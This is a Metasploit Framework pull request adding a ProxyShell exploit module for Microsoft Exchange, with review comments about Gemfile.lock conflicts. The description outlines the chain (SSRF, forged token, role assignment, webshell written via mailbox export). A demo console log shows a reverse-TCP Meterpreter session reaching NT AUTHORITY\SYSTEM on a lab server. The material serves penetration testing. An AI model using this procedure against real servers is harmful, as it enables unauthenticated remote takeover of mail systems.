### PR TITLE
Add an exploit for ProxyShell

### PR DESCRIPTION
**Pull request by zeroSteiner**
This adds an exploit for the ProxyShell chain. It allows a remote, unauthenticated user to achieve code execution as NT AUTHORITY\SYSTEM on a vulnerable Exchange server. The user needs only know the email address of an administrator. The SSRF is used along with a forged token to add the Mailbox Import Export role, then a draft is saved to the targeted user's mailbox that is then exported to write a shell in the webroot of Exchange. The check method tests the SSRF to ensure that it can access the backend `map/nspi/` service. Right now the mailbox export request and webshell are both automatically removed, though the webshell can only be removed when an interactive session is opened like Meterpreter.

## Testing
- [x] Load up the module
- [x] Set the `RHOSTS` and `EMAIL` options (remember that EMAIL needs to be a privileged user right now)
- [x] Set the `PAYLOAD` and associated options
- [x] Run the `check` method, see that the target is vulnerable
- [x] Run the exploit, see that the payload is delivered

## Demo
```
msf6 > use exploit/windows/http/exchange_proxyshell_rce
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/exchange_proxyshell_rce) > set RHOSTS 192.168.159.42
RHOSTS => 192.168.159.42
msf6 exploit(windows/http/exchange_proxyshell_rce) > set EMAIL smcintyre@exchg.lan
EMAIL => smcintyre@exchg.lan
msf6 exploit(windows/http/exchange_proxyshell_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/exchange_proxyshell_rce) > set LHOST 192.168.159.128 
LHOST => 192.168.159.128
msf6 exploit(windows/http/exchange_proxyshell_rce) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Attempt to exploit for CVE-2021-34473
[*] Retrieving backend FQDN over RPC request
[*] Internal server name: win-bpid95acq7e.exchg.lan
[*] Sending autodiscover request
[*] Server: cccb94e0-3175-4ec9-8e8a-62679d874384@exchg.lan
[*] LegacyDN: /o=Target Org/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=508ce51c27b544b38c33df31f99d3118-smcintyre
[*] Sending mapi request
[*] SID: S-1-5-21-2800676829-2777257591-1686523126-1000 (smcintyre@exchg.lan)
[*] Assigning the 'Mailbox Import Export' role
[*] Writing to: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\UhonV8RZ.aspx
[*] Waiting for the export request to complete...
[+] The mailbox export request has completed
[*] Triggering the payload
[*] Sending stage (200262 bytes) to 192.168.159.42
[+] Deleted C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\UhonV8RZ.aspx
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.42:6787) at 2021-08-17 17:32:26 -0400
[*] Removing the mailbox export request

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-BPID95ACQ7E
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : EXCHG
Logged On Users : 6
Meterpreter     : x64/windows
meterpreter > 
```

### CODE REVIEW

File: Gemfile.lock [hunk 1]
```diff
@@ -86,6 +86,7 @@ PATH
       unix-crypt
```
Comment (wvu-r7) [inline Gemfile.lock:86]: Do you mind reverting the changes to `Gemfile.lock`? They're diverging rapidly with `master`. I can fix it up while landing.

File: Gemfile.lock [hunk 2]
```diff
@@ -86,6 +86,7 @@ PATH
...
       warden
       windows_error
+      winrm
```
Comment (wvu-r7) [inline Gemfile.lock:89]: Do you mind reverting the changes to `Gemfile.lock`? They're diverging rapidly with `master`. I can fix it up while landing.

Comment (wvu-r7) [reply Gemfile.lock]: Looks like there are still conflicts.

Comment (zeroSteiner) [reply Gemfile.lock]: Not sure what I did wrong that first time but I tried it again, using the `Gemfile.lock` from the merge base commit be9dda40bd25dae438ba05f5d08fec9730295015.

**Comment by mekhalleh** [comment]
Hello @zeroSteiner , just for information. You can maybe look for the implementation?

image

https://github.com/dmaasland/proxyshell-poc/blob/main/proxyshell-enumerate.py

**Comment by zeroSteiner** [comment]
@mekhalleh I actually tried implementing that in the module already and ran into issues where it wasn't enumerating email addresses for the two environments I tested.

**Review by wvu — APPROVED** [review]

**Comment by wvu-r7** [comment]
https://github.com/rapid7/metasploit-framework/commit/0a06730802c19c9a603ffe49f9c0c078299a85ee

**Comment by wvu-r7** [comment]
# Release Notes

Added an exploit for the ProxyShell attack chain against Microsoft Exchange Server.

**Pull request merged**